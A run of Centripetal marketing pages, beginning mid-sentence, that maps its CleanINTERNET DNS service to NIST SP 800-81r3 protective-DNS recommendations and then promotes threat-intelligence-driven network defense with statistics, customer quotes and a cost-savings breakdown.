updates, not batch downloads — policies reflect the latest threat landscape within minutes of publicationThe intelligence dataset covers domains, IP addresses, URLs, and CIDR ranges across multiple indicator types as well as content within different record types such as TXT Records or HTTPS Records — broader coverage than single-source RPZ feedsKey distinction: Traditional RPZ-based filtering checks domain names. CleanINTERNET DNS goes further — it validates the IP addresses returned in DNS responses against the full intelligence dataset. A domain that resolves to a newly compromised IP is caught even if the domain itself isn't yet flagged.2.1.2 — Name Resolution FilteringNIST recommends applying security-related policies to DNS resolution, including refusing to resolve domains associated with phishing, malware C2, and other threats. The publication notes that protective DNS "can also log queries for domain names that trigger policy to indicate potential malware infection or other malicious activity."How CleanINTERNET DNS conforms:Queries to known-malicious domains are blocked at the DNS layer — before any network connection is establishedDNS responses containing IP addresses associated with threat intelligence are intercepted and prevented from reaching the clientAll blocked queries and responses are logged with full context (query domain, response records, matched intelligence, timestamp) for security team reviewFiltering operates transparently behind your existing DNS infrastructure — configure your DNS servers to forward to CleanINTERNET DNS, and protection applies immediately.2.1.3 — DNS for Digital Forensics and Incident ResponseNIST recommends implementing "robust DNS traffic logging mechanisms" that capture both current and historical DNS traffic. The publication specifically calls for integration with SIEM platforms to "facilitate correlation with cloud workloads and device or user activities."How CleanINTERNET DNS conforms:Every DNS event — queries, responses, blocks, and intelligence matches — is loggedLogs include the original query, all response records (A, AAAA, CNAME, SOA), the matched intelligence source, and the enforcement action takenHistorical DNS data enables retroactive investigation: when a new threat indicator is published, you can search your DNS logs to determine whether any clients previously resolved that domainLog data supports incident timeline reconstruction, compromised host identification, and lateral movement analysis2.2.2 — Encrypted DNS and AuthenticationNIST recommends encrypting DNS traffic wherever feasible using DNS over TLS (DoT), DNS over HTTPS (DoH), or DNS over QUIC (DoQ). The publication notes that the U.S. Government requires Federal Civilian Executive Branch agencies to use encrypted DNS "wherever technically supported."How CleanINTERNET DNS conforms:CleanINTERNET DNS supports DNS over HTTPS (DoH) with customer-specific URI templates, enabling encrypted DNS resolution for browser-based and application-level trafficStandard DNS forwarding is available for environments where encrypted DNS is not yet feasible (e.g., legacy OT/IoT devices, internal DNS infrastructure)Both transport methods receive the same intelligence-driven protection — encryption does not bypass filtering Why this matters: NIST highlights that encrypted DNS is "a vital component in broader organizational strategies for securing internet communications." CleanINTERNET DNS delivers protective DNS capabilities over encrypted channels, satisfying both the security and privacy objectives of the guidance.2.3.1 — Dedicated DNS ServicesNIST recommends that "the infrastructure that hosts DNS services should be dedicated to that task and hardened to reduce the attack surface." The publication specifically states that DNS should run on purpose-built platforms with sufficient capacity for logging, encrypted DNS, and protective DNS functions.How CleanINTERNET DNS conforms:CleanINTERNET DNS is a fully managed, cloud-native service built exclusively for protective DNS — no shared infrastructure, no multi-purpose hostsThe service runs on dedicated infrastructure purpose-built for DNS security with hardened configurationsCapacity for logging, intelligence evaluation, and encrypted DNS is provisioned and maintained by Centripetal — your team does not manage DNS security infrastructure2.3.2 — Resiliency and High AvailabilityNIST recommends geographic dispersion of DNS servers, with "at least two of the authoritative name servers for an organization located on different network segments."How CleanINTERNET DNS conforms:CleanINTERNET DNS operates across multiple geographically distributed service points (US East: 35.196.6.132, US Central: 35.184.180.171)Customers configure both endpoints as primary and secondary resolvers, providing automatic failover if one region is unreachableCloud-native architecture enables horizontal scaling to handle query volume spikes without degradation2.3.3 — Interoperability of the Protective DNS EcosystemNIST recommends ensuring that protective DNS integrates with the wider security ecosystem, including: defense-in-depth integration, SIEM/SOAR logging, API access to threat intelligence, and use of standardized protocols.How CleanINTERNET DNS conforms:Interoperability RequirementCIDNS ImplementationDefense-in-depth integrationDeploys as an additional layer alongside existing firewalls, IDS/IPS, and endpoint protectionSIEM/SOAR loggingAll events streamed and loggedThreat intelligence accessIntelligence is curated and applied by Centripetal; customers receive full visibility into matched indicators via event logsStandardized protocolsStandard DNS (UDP/TCP 53) and DoH — compatible with all major DNS infrastructure4.2.2 — Restricting the Use of DNS with Public ProvidersNIST recommends blocking outbound DNS from the internal network to unauthorized resolvers and restricting stub resolvers to only use encrypted DNS on authorized services.How CleanINTERNET DNS conforms:CleanINTERNET DNS provides an authorized, security-enhanced resolver that replaces or supplements public DNS providersOrganizations configure their DNS infrastructure to forward to CleanINTERNET DNS endpoints, then block outbound DNS to all other resolvers using firewall rulesThis ensures all DNS resolution passes through intelligence-driven filtering — no gaps from shadow DNS or browser-configured public resolvers CleanINTERNET Enterprise integration: Customers who subscribe to CleanINTERNET Enterprise with a deployed RuleGATE can enforce outbound DNS restrictions directly at the network edge — blocking traffic to unauthorized public DNS servers in coordination with CleanINTERNET DNS. This provides hardware-enforced policy compliance without relying solely on endpoint or firewall configurations, ensuring that all DNS resolution is routed through the protected CleanINTERNET DNS infrastructure.4.2.4 — Detecting and Mitigating Data Exfiltration via DNSNIST recommends establishing controls to detect and block DNS tunneling and data exfiltration. The publication identifies key detection patterns: abnormal query volumes, unusual query patterns, high-entropy domain names, and queries for hostnames in known malicious domains.How CleanINTERNET DNS conforms:CleanINTERNET DNS intelligence includes domains associated with known DNS tunneling tools and data exfiltration infrastructureQueries to command-and-control domains — including those used for DNS-based exfiltration — are blocked at the resolution layerDNS event logs provide the query-level visibility needed to detect anomalous DNS behavior patterns, supporting both automated detection and manual investigation4.2.5 — DNSSEC ValidationNIST recommends enabling DNSSEC validation on recursive resolvers to protect the integrity of DNS response data and guard against cache poisoning and response forgery attacks.How CleanINTERNET DNS conforms:CleanINTERNET DNS performs full DNSSEC validation on all upstream DNS responses. The service's recursive resolvers are configured to ensure that forged or tampered responses from upstream authoritative servers are detected and rejected before any intelligence evaluation occurs. CleanINTERNET DNS logs also include a DNSSEC status field for each query, providing visibility into the validation state of every resolution.Architectural note on client-side DNSSEC:Any protective DNS service that modifies DNS responses — whether to block a malicious domain, substitute a sinkhole address, or remove a threat-associated IP — necessarily invalidates the original DNSSEC signature on that response. This is an inherent property of DNSSEC by design: signatures attest to the original data, and any modification breaks that attestation.CleanINTERNET DNS handles this transparently. When a response is modified for security enforcement, CleanINTERNET DNS clears the DNSSEC authentication bits so that downstream resolvers do not receive a falsely signed response. Clients should be configured to trust CleanINTERNET DNS as their recursive resolver and not perform independent DNSSEC validation on responses received from CleanINTERNET DNS. This is the same trust model used by all protective DNS services that perform response modification, and is consistent with the hybrid deployment architecture described in Section 2.1 of the publication.Critically, this does not weaken the security of the DNS resolution chain — CleanINTERNET DNS validates upstream, and the connection between client and CleanINTERNET DNS is secured by the organization's network architecture (and optionally by DoH encryption). The upstream integrity guarantee provided by DNSSEC is preserved; the client simply delegates that verification to CleanINTERNET DNS rather than performing it locally.Summary: NIST 800-81r3 Conformance MatrixNIST SectionRecommendationCIDNS Status2.1Deploy protective DNSConforms — CleanINTERNET DNS is a purpose-built protective DNS service2.1.1Integrate threat intelligence into DNSConforms — 3,500+ feeds, near real-time sync, IP-level response validation2.1.2Apply security policies to name resolutionConforms — Intelligence-driven blocking of malicious domains and IPs2.1.3Log DNS traffic for DFIRConforms — Full event logging to SIEM with structured data2.2.2Use encrypted DNS (DoH/DoT/DoQ)Conforms — DoH supported; standard DNS available for compatibility2.3.1Run DNS on dedicated infrastructureConforms — Fully managed, purpose-built cloud service2.3.2Ensure DNS resiliency and HAConforms — Multi-region deployment with automatic failover2.3.3Ensure protective DNS interoperabilityConforms — SIEM integration, standard protocols, defense-in-depth4.2.2Restrict use of unauthorized DNS providersSupports — Provides authorized resolver; pair with firewall rules to enforce4.2.4Detect and mitigate DNS data exfiltrationConforms — Intelligence covers C2/tunneling domains; logs enable detection4.2.5Enable DNSSEC validationConforms — Upstream DNSSEC validation enabled; clients delegate validation to CleanINTERNET DNSDeploymentAdopting CleanINTERNET DNS to meet NIST 800-81r3 guidance requires no architectural changes to your existing network:Configure your DNS servers to forward queries to the CleanINTERNET DNS service endpointsBlock outbound DNS to unauthorized resolvers (per Section 4.2.2)Review DNS logs — your security team gains immediate visibility into blocked threats and DNS activityTypical deployment time: under one hour. No hardware installation, no agent deployment, no changes to endpoint configurations.About This DocumentThis conformance mapping references NIST Special Publication 800-81 Revision 3: Secure Domain Name System (DNS) Deployment Guide, published March 2026. The full publication is available here.NIST's identification of specific technologies or services in SP 800-81r3 does not imply recommendation or endorsement. This document represents Centripetal's assessment of how CleanINTERNET DNS capabilities align with the publication's guidance. --- ### [From Noise to Knowledge: Making Threat Intelligence Actually Work](https://www.centripetal.ai/resources/from-noise-to-knowledge-making-threat-intelligence-actually-work) Published: 2025-09-10 Summary: Breaches keep rising despite bigger security stacks. Discover why defenses fall short, what’s broken in today’s use of threat intelligence, and how to apply it in real time so it actually prevents… From Noise to Knowledge: Making Threat Intelligence Actually WorkCybersecurity teams today live in a paradox. They’ve invested in firewalls, intrusion detection, endpoint security, SIEM platforms, and entire Security Operations Centers—yet breaches continue to rise across every industry. The reality is stark: while defenses have multiplied, adversaries have outpaced them. The missing ingredient isn’t more tools—it’s smarter, more actionable threat intelligence.This dives into why traditional approaches fall short, what’s broken in the way organizations use intelligence, and how to measure and apply intelligence so it actually prevents breaches. The Current Problem: Strong Defenses, Weak OutcomesOrganizations pride themselves on “layered defense.” Firewalls block traffic, intrusion detection systems flag suspicious activity, antivirus tools catch malware, and endpoint agents try to remediate infections. On top of that, SIEMs and SOCs aggregate alerts and coordinate response.So why do we still see headlines about billion-dollar breaches?Because most of these tools are reactive. They detect, log, and investigate after an attacker is already inside. By then, damage is measured in hours of downtime, lost data, or millions in regulatory fines.Defenders aren’t failing because they’re under-resourced. They’re failing because their defenses lack foresight.The Intelligence Gap: The Missing LayerThreat intelligence is supposed to close that gap—yet adoption remains alarmingly low. Only 20% of organizations use any form of threat intelligence. That leaves the majority flying blind against adversaries who move faster and share better than defenders do.Consider two uncomfortable truths:99% of exploited vulnerabilities were already known to security professionals for at least a year.Over 90% of successful breaches stem from already-known locations, not novel “zero-day” exploits.In other words, defenders are being beaten not by unknowns, but by knowns that weren’t operationalized and actionably applied.The Intelligence Challenge: Too Little vs. Too MuchEven when organizations do use intelligence, they often face a double-edged sword.Too Little Intelligence creates blind spots. Gaps in coverage mean adversaries slip through unnoticed. Analysts miss early warning signs, leading to false negatives. Too Much Intelligence creates a different problem: noise. SOCs drown in redundant alerts and low-value data. Analysts chase false positives, leading to fatigue and wasted resources. This is the “paradox of plenty”—having more information but less clarity. The challenge isn’t access to data. It’s transforming raw intelligence into balanced, prioritized, and actionable signals.A Framework for Measuring Intelligence QualityNot all intelligence is created equal. To understand quality, we can measure it across three dimensions:1. Intelligence Breadth (Coverage)Coverage: How wide is the net? Are you seeing threats across geographies, industries, and attack surfaces?Pioneering: What percentage of intelligence is first discovered (non-redundant, unique)?Entropy: Is intelligence evenly distributed, or do providers cluster around the same small slice of threats?Example: If one provider reports thousands of phishing domains but none on ransomware infrastructure, you’ve got breadth gaps.2. Intelligence Depth (Understanding)Overlap: How many signals are validated by multiple providers? Redundancy here builds trust.Temporal Persistence: How long does intelligence remain relevant before it decays?Context & Relationships: Are threats enriched with links between IPs, domains, hashes, and campaigns?Key insight: Research shows that only 4% of intelligence overlaps within one day, and 7% within 128 days. This suggests intelligence “lifetimes” are short—and keeping it current is critical.  3. Actionability MatrixBy plotting breadth and depth, we can categorize intelligence into four types: TypeBreadthDepthResultOptimalHighHighActionable intelligence, ready to enforceTunnel VisionLowHighDeep context but narrow scopeNoisyHighLowMany signals, but low quality/contextWeakLowLowPoor coverage and low reliabilityThe lesson: actionable intelligence isn’t about having the most—it’s about having the right mix of breadth and depth Real-World Impact: Case ExampleThe risks of inadequate intelligence are not abstract. Consider CVE-2025-24893, a critical XWiki vulnerability.At publication:40% of related Indicators of Compromise (IoCs) were already known to providers.Organizations without sufficient breadth and depth had 30% less coverage of the relevant IoCs.This meant attackers exploiting the vulnerability had a wide open path into underprepared organizations—even though much of the necessary intelligence was already available. The Path Forward: From More Tools to Smarter IntelligenceThe future of cybersecurity doesn’t hinge on layering yet another tool into the stack. Instead, it requires a shift in mindset: from reactive defense to proactive prevention powered by intelligence.Key elements of that future include: ScalabilityThe ability to process and curate billions of IoCs without overwhelming analysts. QualityContinuous measurement of breadth and depth to filter noise and surface real threats. IntegrationIntelligence that directly fuels firewalls, EDR, SIEMs, and SOC workflows—turning static defenses into adaptive ones. Feedback LoopsIntelligence that updates dynamically based on what’s working and what’s missed. TrustReliance on validated, unbiased sources to avoid false confidence or skewed coverageCybersecurity has reached a turning point. Every breach proves the same truth: firewalls, EDR, SIEMs, and layered defenses alone cannot keep pace with adversaries who adapt in seconds. What separates successful defenders isn’t the number of tools they stack, but the quality of intelligence fueling those defenses.Centripetal believes the future belongs to intelligence-driven defense—one where trusted, validated intelligence is operationalized in real time, at internet speed, and at a scale no human team could achieve alone. But scale alone isn’t enough. The real advantage comes when human ingenuity, strategic judgment, and contextual awareness are combined with artificial intelligence and vast streams of threat intelligence. Together, they create a defense model that is both unrelenting in speed and discerning in precision—turning overwhelming data into proactive protection.This means:Stopping threats before they reach the network, not after the alert.Transforming billions of global indicators into actionable enforcement, continuously updatedRelieving security teams from chasing noise so they can focus on what truly matters.The end of reactive security promises is here. The organizations that embrace intelligence as the engine of their defense will be the ones that shift from surviving breaches to preventing them altogether. --- ### [A Disconnect in Threat Intelligence](https://www.centripetal.ai/resources/threat-intelligence-disconnect) Published: 2025-08-12 Summary: The fast pace of digital transformation fuels business growth around the world – but unfortunately, it also heightens exposure to cybersecurity threats. Exposure to these threats due to increased… A Disconnect in Threat IntelligenceIs it time for a more strategic approach?Rising Cybersecurity Threats Demand a Bold New ApproachThe fast pace of digital transformation fuels business growth around the world – but unfortunately, it also heightens exposure to cybersecurity threats. Exposure to these threats due to increased vulnerabilities can quickly turn into breaches with devastating economic impact: the global cost of cybercrime today is $8 trillion, and it’s estimated to hit $10.5 trillion by 2025. Whether it’s malware, phishing, ransomware or DDoS attacks, cyberattacks are increasingly difficult for organizations to avoid, with 47% of U.S. businesses experiencing some form of cyberattack in 2022. And, sophistication is scaling quickly with attackers deploying innovative methods to bypass standard security measures, such as AI-powered intrusions and last-minute domain changes. Adding to this, the widespread availability of pre-built hacking tools and the increased availability of access broker services has lowered the barrier to entry for new hackers.In the face of escalating cyberwarfare, high confidence threat intelligence (TI) and effective analysis is an integral part of any cybersecurity strategy. Consequently, organizations are procuring more data sources, including TI feeds, and hiring skilled analysts to make sense of it all. 63% of cybersecurity professionals say they’re spending significantly more money than ever before on cyber threat intelligence (CTI) programs.Despite this abundance of effort, they’re still struggling to make data-backed decisions – 79% say that majority of the time, they make decisions without adversary insights. Because of this, cybersecurity teams are reacting after threats have already happened, and failing to achieve the desired impact from their TI investments. That’s why 71% say they have difficulty measuring any ROI or benefits of their CTI programs. In order to see the full promise of TI, security teams must adopt a more proactive approach:At Centripetal, we call this Adaptive, Real-Time Threat Intelligence (ART), which requires comprehensive TI coverage, rapid detection and skilled analysis – designed to prevent a greater number of breaches before they occur.This paper will explore why the traditional approach isn’t working against today’s threats and how ART Threat Intelligence can help organizations detect and mitigate threats earlier, reducing the burden downstream and strengthening security across the enterprise.Current Threat Intelligence Programs Miss The MarkToday’s security teams are in a perpetual state of reaction, retroactively reviewing breaches and adjusting security policies to prevent the next attack. This may have been a sustainable approach when both organizations and the hackers themselves were limited by lack of advanced tools and technologies.But now, hackers have adopted increasingly sophisticated techniques, and organizations have yet to adapt their technologies and processes to handle these new threats – creating a mismatched playing field that puts organizations at a disadvantage.While recent developments in CTI programs showed promise in better supporting organizations, it has become apparent over time that CTI programs still lack the structure, process, and objectives to realize value. They’re simply unable to keep up as threats evolve, presenting significant challenges that elevate the risk of security incidents.“Today’s global cyberthreat landscape is constantly evolving and becoming more sophisticated, requiring a more proactive and adaptable approach to cybersecurity.Collectively, we have the power and the responsibility to build a secure digital world, and it begins with neutralizing the ever-present and constantly evolving cyberthreats.”INFRASTRUCTURE AND SECURITY MANAGER, LEADING IRISH LEGAL FIRMChallenge 1Limited TI Feeds Feeds Don’t Offer Enough ProtectionYour TI vendors may claim to have unique intel – and it’s possible they do. But without a high volume of feeds, you may not see the right indicators of compromise (IOCs) to truly understand the threat. There’s at most a 4% overlap between different TI feeds, revealing significant gaps in coverage. This leaves organizations in the dark, seeing 0.1% of the IOCs crucial for detecting threats effectively.Challenge 2The Current Methodology is Too Slow To Prevent AttacksOn average, it takes an alarming 207 days to detect a breach and an additional 77 days to rectify the damage. This sluggish response is rooted in the highly manual process required to scrutinize the abundance of data and sort through millions of events recorded in security information and event management (SIEM) systems.Minor security events can quickly evolve into higher-risk threats, so while teams are reacting, the threat is already occurring. For a truly effective security posture, teams must have the tools and information at their fingertips to detect attacks in real-time and quickly launch an effective response.Challenge 3Existing Tools and Technologies are not Designed to Process a High Volume of IOCSWhile some networking products leverage TI to detect or block threats, traditional tools can’t do this at the levels needed. They may struggle to filter out the “noise” within network traffic, hindering their efforts to detect the real threats.Consider your current system’s limitations: your firewall can likely manage 50,000 to 150,000 rules, based on the product. These rules are fixed and need to be managed manually. But, there are many potential threats in the world at any given time, meaning your firewall covers only a tiny fraction of all known threats. Without real-time threat updates or context, your team is overloaded with log data, missing event data on the majority of your network traffic.Without major computing power and automation to detect patterns of concern, the volume of modern cyberattacks simply exceeds the capacity of most organizations. It doesn’t have to be this way: 95% of breaches could have been prevented with the right technology in place.Figure 1: IOC coverage overlap measured across TI feed providers. High percentage of IOCs are only reported by a single TI provider, indicating no overlap and thus insufficient coverage with a few TI feeds.ESG Technical Validation: CleanINTERNET by Centripetal, 2022 Security Teams Current Struggle To Keep Up, Requiring A More Dynamic SolutionBoth team size and skillset are a hurdle for security teams working to protect their organizations: 63% of cybersecurity professionals say that they don’t have the necessary staffing or skills in-house to effectively run a program for their organization. Another 60% of businesses report they have trouble holding onto qualified cybersecurity staff.Security teams are falling behind.63% of cybersecurity professionals say that they don’t have the necessary staffing or skills in-house to effectively run a program for their organization.ESG: Cyber Threat Intelligence Report, 2023Small companies often have limited security or IT teams, and even enterprises, despite having dedicated analysts, struggle with the sheer scale of security events. For instance, organizations frequently witness tens of millions of security events per day across various devices including firewalls, Intrusion Detection Systems/Intrusion Prevention Systems (IDS/IPS), Deep Packet Inspection (DPI) systems, and web filters. This load only escalates as the security industry generates even more events with newer approaches emphasizing observability and telemetry for detection and response.Applying security rules based on threat data across a variety of devices adds to the team’s burden and leads to delays. These devices, typically managing only a few hundred thousand rules, can also experience performance issues when tasked with extensive rule-based packet filtering. Additionally, the use of TI for forensic analysis in Security Information and Event Management (SIEM) systems poses similar challenges.These conditions compound the pressure on security teams. Ultimately, despite considerable investments in security, organizations remain exposed as the risk of compromise escalates, highlighting the need for a more comprehensive, robust, and automated threat management strategy.Adaptive, Real-time Threat Intelligence Addresses The Modern Threat LandscapeA new approach to cybersecurity, one that can effectively scale with the volume, speed, and changing nature of threats is possible with the right tools in place. ART threat intelligence proactively blocks breaches, improving response times and preventing future attacks. Teams must put several strategies in place to leverage this new approach.Strategy 1Increase Your Intelligence CoverageA handful of TI feeds will not be enough to protect your organization from today’s sophisticated threats. To get a comprehensive, real-time view of threats, enterprises should increase the number of high-quality TI sources and feeds. But that can be cost-prohibitive, particularly for smaller organizations.Instead, look for tools that aggregate information across many TI providers, consolidating many sources of intelligence into a single, curated feed. These tools can significantly broaden your awareness of threats, help you identify emerging threats, track the activity of known threat actors, and better assess the risk of being targeted.Strategy 2Automate the TI Pipeline From End to EndSpeed is one of the most critical characteristics of a proactive defense. When a new IOC or threat source is identified, you’ll want to block malicious traffic as soon as possible. Automated TI tools quickly process large volumes of data, identify highest-risk threats, and allow you to incorporate information into your security infrastructure within minutes – matching the speed at which attacks can break out.Look for TI tools that seamlessly integrate intelligence with existing technology in actionable ways – automation has to be embedded in the entire process to be most effective. Furthermore, focus on tools that update the TI pipeline in near real-time, within minutes, given the speed at which compromises can turn into breaches and crossover to adjacent systems.Strategy 3Reduce Noise for Timely Accurate IntelligenceSecurity teams operate best when receiving high-quality, accurate, and timely threat intelligence. However, traditional security measures such as firewalls and router ACLs struggle to filter the noise of network traffic. Events, alerts, and logs of security technologies such as IDS, Extended Detection and Response (XDR) and Network Detection and Response (NDR) add to the cacophony, making it difficult for security analysts to find the serious, credible threats – akin to searching for a needle in a haystack. But instead of searching faster for the needle, reduce the size of the haystack.Utilize powerful packet filtering services to block more known threats before they reach your security team. Look for ones that can operate at line speed and even protect you in the cloud.Strategy 4Uplevel your Threat Analysis CapabilitiesYour last line of defense is your security team’s vigilant analysis of threats that remain. But not all organizations are applying the time and resources required on this analysis phase, and security teams report cyberthreat analysis as their least proficient area in the CTI lifecycle. The obvious answer might be to hire and train more qualified analysts, but there are better options.Security operations (SecOps) services can augment your in-house security teams with dedicated security analysts. This is not about hiring contractors instead of full-time employees. This is about upleveling your threat analysis capabilities with highly trained analysts who have greater visibility of the threat landscape across your industry or the globe.Also, AI-based threat detection can now help human analysts improve response times as well as identify more patterns and threats before they become a breach. Look for tools that incorporate AI and machine learning to pull out the highest quality intel from multiple incoming and outgoing streams, thus focusing your security team’s attention on the most credible threats.Conclusion: It’s Time To Embrace Adaptive, Real-time Threat IntelligenceChallengeA large northeastern health system was struggling with 6M firewall events per hour (up to 63M daily), driving up storage costs in its SIEM system.SolutionImplementing Centripetal’s CleanINTERNET® , the system dramatically reduced firewall events, experiencing only 500K per day, a 120x reduction. They also went from storing 5.7GB to 11.7MB per hour, leading to considerable cost savings.After two months and a few rounds of high confidence threat shielding, there were zero disruptions to the network.“We’ve gone from 3M blocks an hour to 20,000 an hour, to 6,000 an hour. What we will now record in SIEM from outside-in blocks over three weeks is what we used to record inSEIM in one hour.”Infrastructure and Security Manager, Leading Irish Legal FirmTraditional methods are unable to manage the ever-evolving threat landscape. The increasingly contentious battle against cyberthreats demands a dynamic, forward-thinking approach, one that leverages advanced threat intelligence to proactively protect organizations.It’s time to broaden your intelligence coverage, fast-track response with automation, cut through the noise, and fuse human and AI-powered analysis. By doing so, you’re not just refining your defenses, but revolutionizing them. Let’s step into this new era, prepared, vigilant, and stronger than ever.  --- ### [Intelligence-Powered Cybersecurity For Financial Services](https://www.centripetal.ai/resources/financial-services) Published: 2025-08-12 Summary: The financial services industry faces significant cybersecurity threats. By leveraging intelligence-powered cybersecurity and implementing comprehensive security strategies, financial institutions… Intelligence-Powered Cybersecurity For Financial ServicesThe financial services industry is a prime target for cyberattacks, ranking as the second most attacked sector, according to Statista. This is largely due to the valuable data these institutions collect, including consumer payment card information, financial account details, and other sensitive data.As a result, data breaches are a significant concern. The FBI reports that phishing is the most common type of cyberattack against financial services firms. Data breaches expose millions of customer records annually, with the average cost per breach exceeding $4 million. In 2023, 64% of financial institutions reported experiencing a cyberattack, with phishing being the predominant threat.Challenge 1Increasing Cost of CybercrimeCyberattacks are expensive. The average data breach costs the financial sector an average of $5.9 million. Its estimated that cybercrime costs the global economy a staggering $6 trillion annually, with projections of $10.5 trillion by 2025.Challenge 2Rise of Ransomware and VulnerabilitiesRansomware attacks are increasing, crippling businesses by encrypting data and demanding hefty ransoms to unlock it. Additionally, vulnerabilities in financial software have increased by a staggering 300% in the past five years. Mobile banking apps are also growing targets, with attackers exploiting weaknesses in app security.Challenge 3Sophistication of AI-Powered AttacksAI-powered attacks are becoming more sophisticated, making it harder for traditional security measures to keep up. These advanced attacks can adapt and learn from security measures, increasing their effectiveness over time.Challenge 4Regulatory Scrutiny & ComplianceRegulatory scrutiny is increasing, with governments holding financial organizations accountable for protecting customer data. Financial institutions must comply with stringent regulations, which can be challenging to navigate and implement effectively.Challenge 5Lack of Comprehensive Security PlansA significant portion of the financial institutions lacks comprehensive security plans. According to BAE Systems, 41% of fintech companies report not having implemented a full security plan. This lack of preparedness leaves them vulnerable to cyberattacks. Intelligence-powered cybersecurity leverages advanced technologies and data analytics to prevent, detect, and respond to cyber threats. In the financial services sector, this approach is crucial for several reasons:Proactive Threat DefenseIntelligence-powered systems can analyze vast amounts of data to identify potential threats before they become full-blown attacks, mitigating risks early.Real-Time Monitoring & ResponseThese systems provide real-time monitoring of networks and systems, allowing for immediate response to any suspicious activity, preventing or minimizing damage from cyberattacks.Enhanced Threat IntelligenceLeveraging global threat intelligence keeps financial institutions informed about the latest cyber threats and trends, allowing them to adapt their security measures accordingly. Actionable Strategies The financial services industry faces significant cybersecurity threats, with data breaches, phishing attacks, ransomware, insider threats, and advanced persistent threats being the most prominent. The high costs associated with cybercrime, coupled with increasing regulatory scrutiny, highlight the need for robust cybersecurity measures.By leveraging intelligence-powered cybersecurity and implementing comprehensive security strategies, financial institutions can better protect themselves and their customers from these ever-evolving threats.The Solution: 
proactive protection with CleanINTERNET®Centripetal’s CleanINTERNET® solution introduces a distinctive approach finely tuned to the unique needs of financial institutions. In an industry where time is crucial and financial data security is paramount, harnessing real-time threat intelligence from a global network, Centripetal offers visibility into potential threats long before they can impact your network. This technology acts as a shield, safeguarding sensitive financial information and critical banking systems.CleanINTERNET® is an intelligence powered security solution that leverages high-performance computing technology, patented software algorithms, and highly skilled security analysts to provide a cost-effective alternative protection strategy.“I did some spot checking on the firewall logs before Centripetal - 60 million before the appliance was implemented down to 500,000 the other day."CENTRIPETAL CUSTOMERFinancial institutions that have adopted CleanINTERNET® report being impressed by its comprehensive capabilities, far exceeding basic intelligence feeds. Achieving a comparable security posture independently would be financially unfeasible.CleanINTERNET® offers a revolutionary approach to cybersecurity, prioritizing threat intelligence and shifting from reactive to proactive defense, thereby enhancing the efficiency and effectiveness of financial services security teams. With advanced shielding technology, CleanINTERNET® can eliminate the majority of threats and mitigate the impact of any malicious code that penetrates defenses.This technology blocks malicious network attempts from known sources, prevents outbound activity to malicious domains, and eliminates unnecessary reconnaissance traffic from the financial institutions network.By implementing CleanINTERNET®, financial organizations can quickly strengthen their cyber defenses without significant financial investment or the need to expand their cyber analyst teams. This solution greatly reduces the number of security events, allowing IT teams to focus on delivering patient care with greater confidence. --- ### [CleanINTERNET® - Building the Business Case](https://www.centripetal.ai/resources/building-the-business-case-for-cleaninternet) Published: 2025-08-07 CleanINTERNET® - Building the Business CaseThe Smartest Way to Stop Threats — and Save MillionsThreats Stopped Before They Reach Your Network. Costs Stopped Before They Spiral.Today’s security stacks are bloated, reactive, and expensive. Tools are noisy. Services are redundant. And breaches still happen. Centripetal CleanINTERNET® flips the model.We combine the world’s most complete threat intelligence with AI-accelerated enforcement and expert human oversight to stop 99% of known threats before they ever reach your network.Fewer threats mean fewer alerts. Less overhead. Lower risk. And massive cost savings across your entire security ecosystem. The CleanINTERNET Business Case at a Glance: COST AREA AVERAGE ANNUAL SAVINGS* Firewalls Infrastructure $120,000 SIEM & Event Storage $70,000 Security Operations Team $200,000 Managed Services $400,000 Threat Intelligence Feeds $150,000 Reduced Breach Risk $100,000+ Total Estimated Savings $1,040,000 per year *Based on real customer data across mid-sized enterprise deployments. Where the Savings Come FromFirewall Cost ContainmentModern firewalls are expensive, complex, and increasingly ineffective against sophisticated threats. CleanINTERNET reduces firewall load by blocking threats upstream—allowing organizations to streamline firewall configurations and reduce licensing, services, and hardware investments.“60 million events before CleanINTERNET, down to 500,000 after.”– Sr. Cybersecurity Architect, Large Healthcare SystemCut SIEM Costs Without Losing VisibilityThe more alerts your SIEM processes, the more you pay—in both software licenses and storage. CleanINTERNET eliminates up to 90% of noisy event traffic, reducing SIEM ingestion and dramatically lowering licensing and analyst workload.“1 billion events cleaned in a week. You’re cleaning our dirty laundry."– CISO, U.S. Hospital NetworkReduce Analyst Burnout and TurnoverSecurity teams are overwhelmed and understaffed. By blocking known malicious traffic before it reaches the network, CleanINTERNET reduces incident volume, allowing analysts to focus on what really matters—and making burnout and churn less likely."Whatever you’re doing—it’s working. Our pen testers had nothing to report."– Platform Manager, MSSPRethink Threat Intelligence ROIEnterprises pay hundreds of thousands annually for CTI feeds they struggle to operationalize. CleanINTERNET leverages the largest volume of commercially available threat intelligence in real time, automating their enforcement at the edge—so you get the power of world-class intelligence without the overhead.“We went from 1 to 82 threat feeds. It’s a huge leap in capability.”– Sr. Cybersecurity Architect, Medical CampusMinimize Catastrophic RiskBreaches cost businesses millions in recuperative costs and an undeterminable amount in reputational damage. Even reducing breach probability by 10% with CleanINTERNET yields a $100K risk offset—conservatively.“We can’t live without it. CleanINTERNET lets me sleep at night.”– Sr. InfoSec Engineer, Manufacturing CompanyShrink Your Managed Services FootprintMSSP and MDR contracts are ballooning in cost. With CleanINTERNET eliminating the bulk of malicious traffic, customers renegotiate contracts or reduce MSSP scope, while maintaining or improving security posture.“You take that worry off my plate so I can focus on other projects.”– CTO, Midwest Tech Company The Centripetal Difference Threat Intelligence at Unmatched Scale We apply billions of global indicators to every packet—inbound and outbound. AI + Human Intelligence Our platform moves at machine speed. Our experts validate, tune, and hunt. Zero Disruption, Full Coverage Inline or mirrored deployment with no added latency or risk. Real Results, Real Fast Customers see immediate reductions in event load, cost, and stress. CleanINTERNET. Always Watching. Always Working Better Protection. Less complexity. Lower Cost. That's the Centripetal Way. About CleanINTERNET® CleanINTERNET® is Centripetal’s intelligence-powered threat prevention platform. It combines high-performance computing, patented algorithms, and elite analyst support to stop attacks before they start. It’s not just detection—it’s a proactive network defense. Why Centripetal At Centripetal, we don’t flinch when it gets hard. We stand in the breach with our customers, combining mission-driven focus, cutting-edge technology, and deep expertise to deliver real, measurable security outcomes. We've protected the most sensitive digital environments in the world. Now, we bring that same discipline, speed, and reliability to yours. --- ### [Managing Costs: What You Can Save](https://www.centripetal.ai/resources/saving-isnt-a-choice-its-part-of-the-solution) Published: 2025-08-06 Saving Isn’t a Choice,
